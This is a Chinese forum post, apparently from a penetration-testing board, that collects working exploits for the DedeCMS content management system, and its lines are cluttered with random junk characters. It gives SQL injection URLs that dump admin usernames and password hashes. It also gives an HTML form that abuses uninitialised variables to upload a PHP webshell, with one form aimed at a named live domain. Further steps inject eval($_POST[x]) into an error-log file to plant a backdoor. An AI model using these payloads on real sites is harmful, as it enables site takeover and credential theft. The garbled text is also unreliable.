http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='! o4 o% I, p7 n  B2 a: e
; U5 Q& K/ h$ a- u

0 C( Z7 {/ B" W. C" z) H% L, E+ h+ d- E+ v
& O' y0 M' @, a/ @/ |

4 }. B/ G. ~2 z1 r# @% |
" y9 Y7 a! G7 ~3 t5 Y1 {/ Y! B7 B3 ]+ X# v" C: t. ^' q) T
- ~& z; ?1 v1 {6 d) S7 i% K
: z- V+ y, X; r# y1 O6 k7 E
+ L) M( \. t) F& N" p8 q
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
! r$ p+ S# H( i1 e% C6 S- {<html>
) ^$ l8 U& z+ ~4 Q* r( n<head>" r+ n5 N8 i7 C
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
4 n8 ^  w/ U+ a3 G* k' E</head>$ O; I; C' b- R: g4 `9 Y: O
<body style="FONT-SIZE: 9pt">2 L3 G+ u' o; e1 K" P
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />3 a% |0 S* C! a1 {
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>) v  m# h" R! w' j' S6 g. {" |
<input type='hidden' name='activepath' value='/data/cache/' />
" ^; s8 Y) ^$ y<input type='hidden' name='cfg_basedir' value='../../' />
, Z7 A. Z) J: }<input type='hidden' name='cfg_imgtype' value='php' />- |) B8 m2 @! l
<input type='hidden' name='cfg_not_allowall' value='txt' />8 t9 E" L. [4 D# |* g
<input type='hidden' name='cfg_softtype' value='php' />
! }' }6 E, o! M$ A0 F<input type='hidden' name='cfg_mediatype' value='php' />
8 w' `4 H& K$ P# Y, Z. p0 B& P) w<input type='hidden' name='f' value='form1.enclosure' />
' f0 [( j2 f& F  I4 a' ]6 }<input type='hidden' name='job' value='upload' />
* I: W5 W. T5 e+ X1 h<input type='hidden' name='newname' value='fly.php' />, t! I% c! C# r6 M* E1 [
Select U Shell <input type='file' name='uploadfile' size='25' />/ G- N6 y+ W0 {& Y
<input type='submit' name='sb1' value='确定' />( Q: _5 x$ {; j' d3 X' v. H
</form>
+ `% k# ]% z& R<br />It's just a exp for the bug of Dedecms V55...<br />
9 O( w6 y/ c5 CNeed register_globals = on...<br />
' Z! \- u  K; ^2 n0 UFun the game,get a webshell at /data/cache/fly.php...<br />
; p4 |- E  N" b</body>* i) U3 N5 _7 J' `7 M
</html>' P( }0 [& S! e$ w* v
1 M- x. {+ ~) Q/ q" T, m5 I7 E

" w! t0 J" }& @+ N2 g2 E' p
/ T. M% J. z1 Y% D* m2 @$ u4 s/ ~" ?" l
" ?6 H- B: a7 u: [6 f

8 R+ F  r7 H* t7 d1 m# G
, Y2 j* x# A+ V' f( T
/ v" f. U/ W% w) L0 ]2 f" e( w, Y% s- J# G  N

) I$ Z1 V, E. r$ @. p. l织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞% V' a7 d( ~5 e  o! W1 b
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。0 K$ k/ b- A! g% f( l
1. 访问网址:9 y5 H: f' x0 L' `: N9 y' @
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
' n' [  B4 c, ^! [3 j3 P可看见错误信息
0 ^$ |, I* ?% K6 i. Y) Q2 k7 I" b
4 D7 K# G" {: m# @6 R" @
6 u% G4 m' I) T1 D1 P2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。+ S8 d" h+ q8 \7 ~( `6 b3 _
int(3) Error: Illegal double '1024e1024' value found during parsing
) m, ]% B7 T3 \! O0 |  TError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>8 J  B8 _# x1 K: j
* I( n6 P/ ?+ l

4 U$ r: b8 ?: B5 W4 _! D3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是. [7 S( N) W; t8 U7 @

6 m% k) s7 h2 _9 E( b) p: U1 l$ j# |: E* Y0 n) H- q9 b
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>7 K- c. J- m, c0 _$ k  e/ h
- C1 H- e' ~3 I* p* b: q
/ R% K3 g: V, {5 j- \2 H4 p
按确定后的看到第2步骤的信息表示文件木马上传成功.
. Z) ?/ |1 s: E6 r, _: @4 W2 l5 A7 s3 u
# I, Z) Z' ?( r* G
+ Y( m, t3 D: G: D: N
. ^7 Z/ D/ [1 z/ t2 n2 W

% \2 ~0 ~; l5 L6 Y& q( \
3 e6 B- _# e0 q* |3 z" }( d- ^
& [6 B) I, i4 c1 p$ I( E& u1 E, W
& W" `: V; w" @% {8 I
3 V: G: Z; e1 C2 V+ e8 i- x
6 v; n; ^/ o8 z& V; }& |& l

% |& v* y% Z* w0 e; [织梦(DedeCms)plus/infosearch.php 文件注入漏洞
' ^# v- ^- O/ h2 u: `/ P8 Ihttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2